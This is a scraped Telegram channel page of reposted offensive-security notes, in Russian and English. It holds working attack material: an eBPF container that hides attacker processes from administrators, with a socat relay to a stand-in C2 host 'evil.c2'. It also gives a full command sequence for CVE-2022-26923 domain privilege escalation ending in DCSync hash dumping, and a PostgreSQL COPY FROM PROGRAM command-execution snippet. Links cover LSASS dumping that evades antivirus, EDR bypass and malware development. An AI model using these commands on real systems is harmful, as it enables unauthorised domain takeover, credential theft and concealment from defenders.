NEW BOT Телеграм, страница - 163633155

offsec notes

267 subscribers

16 photos

4 files

92 links

reading list

Download Telegram

About

Blog

Apps

Platform

267 subscribers

Forwarded from Похек (Sergey Zybnev)

This media is not supported in your browser

VIEW IN TELEGRAM

🔴 nysm
Скрытый контейнер для постэксплуатации.
#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?

Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.

Установка:

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make

Использование:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

  -d, --detach        Run COMMAND in background
  -r, --rm                Self destruct after execution
  -v, --verbose      Produce verbose output
  -h, --help             Display this help
  --usage                Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

👉

https://github.com/eeriedusk/nysm

🌚

Please open Telegram to view this post

VIEW IN TELEGRAM

202 views08:46

Forwarded from Purple Chronicles (ELK Enjoyer)

Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)

🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:

# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10

Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer

addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'

Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:

Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:

certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:

certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:

secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD

Please open Telegram to view this post

VIEW IN TELEGRAM

240 views12:51

Lsass dump bypassing AV

MirrorDump
nanodump
Physmem2profit

274 views10:49

PowerView cheatsheet

Link

PowerView-3.0 tips and tricks

PowerView-3.0 tips and tricks. GitHub Gist: instantly share code, notes, and snippets.

265 views18:01

Forwarded from shit notes

Примеры как выглядят вулны в коде

Клик

GitHub - yeswehack/vulnerable-code-snippets: Twitter vulnerable snippets

Twitter vulnerable snippets. Contribute to yeswehack/vulnerable-code-snippets development by creating an account on GitHub.

🐳1

251 views16:27

* detailed information about the C2 Matrix

* lab environment used to test the various C2s

* details about each C2 (install and use)

* how to setup attack infrastructure

The C2 Matrix | C2 Matrix

Welcome to the C2 Matrix!!

332 views09:24

Forwarded from Proxy Bar

ARTToolkit
*
Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam
*
Link

248 views07:06

malware development useful links

BypassAV - Repo with the essential techniques to bypass antivirus and EDR

Bypass AV (practical examples) - useful examples & links

shellcode-fluctuation - article

executing the payload in memory - article

maldev-for-dummies - A workshop about Malware Development

The post will be updated
#maldev

284 viewsedited 09:41

Kerberos delegations

Link

luemmelsec.github.io

S4fuckMe2selfAndUAndU2proxy - A low dive into Kerberos delegations

Hello fellow h4x0rs, this time we are going to have a closer look at the different types of delegations inside an Active Directory.
We’ll try to figure out what this magic is all about and of course how we can abuse it for fun and profit.

Prepare yourself…

352 views15:12

Forwarded from Reverse Dungeon

https://medium.com/@sam.rothlisberger/havoc-c2-with-av-edr-bypass-methods-in-2024-part-1-733d423fc67b

Havoc C2 with AV/EDR Bypass Methods in 2024 (Part 1)

Havoc C2 with AV/EDR Bypass Methods in 2024 (Part 1) DISCLAIMER: Using these tools and methods against hosts that you do not have explicit permission to test is illegal. You are responsible for any …

280 views09:43

Advanced sql injection techniques

Advanced SQL Injection Cheatsheet
SQL Injection Knowledge Base
sqlwiki

285 views18:36

Forwarded from xclip

Статьи по созданию кастомных нагрузов для Havoc C2

- https://notateamserver.xyz/havoc-implant/

- https://codex-7.gitbook.io/codexs-terminal-window/red-team/red-team-dev/extending-havoc-c2/third-party-agents

- https://payloads.online/archivers/2023/10/12/fda899c9-47ea-40e6-b6fc-a00600ccc9cb

#malware #redteam

275 views13:09

Forwarded from Offensive Xwitter

😈 [ MDSec @MDSecLabs ]

Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"

🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/

🐥 [ tweet ]

302 views13:27

313 views22:29

Жуков_Андрей_Хакерство_Физические_атаки_с_использованием_хакерских.pdf

🤯1

332 views22:29

ntlm directories scanner - utility for searching directories that accept ntlm in services such as

* OWA servers
* Skype for Business/Lync servers
* Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
* ADFS servers

GitHub - nyxgeek/ntlmscan: scan for NTLM directories

scan for NTLM directories. Contribute to nyxgeek/ntlmscan development by creating an account on GitHub.

🐳1

313 viewsedited 16:16

Forwarded from Внутрянка

Материал про пентест 1С

Еще 1 раз про пентест 1С

Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…

292 views16:30

Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.

Совершает такие проверки, как

* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc

304 views22:16

Kubernetes Goat - Учебная платформа с лабами и материалами по безопасности куба

* Learning Kubernetes
* OWASP Kubernetes Top 10
* MITRE for kube
* Lab’s scenarios

Welcome to Kubernetes Goat | Kubernetes Goat

Interactive Kubernetes Security Learning Playground

341 viewsedited 09:28

RCE in postgres

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Автоматизация - Link
(Закомментить checkVersion(connection))

Exploit Database

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated). CVE-2019–9193 . remote exploit for Multiple platform

443 views09:45

Forwarded from Омский багхантер

Самый быстрый способ получить список всех путей веб-приложения на Next.js:

console.log(__BUILD_MANIFEST.sortedPages)

366 views11:30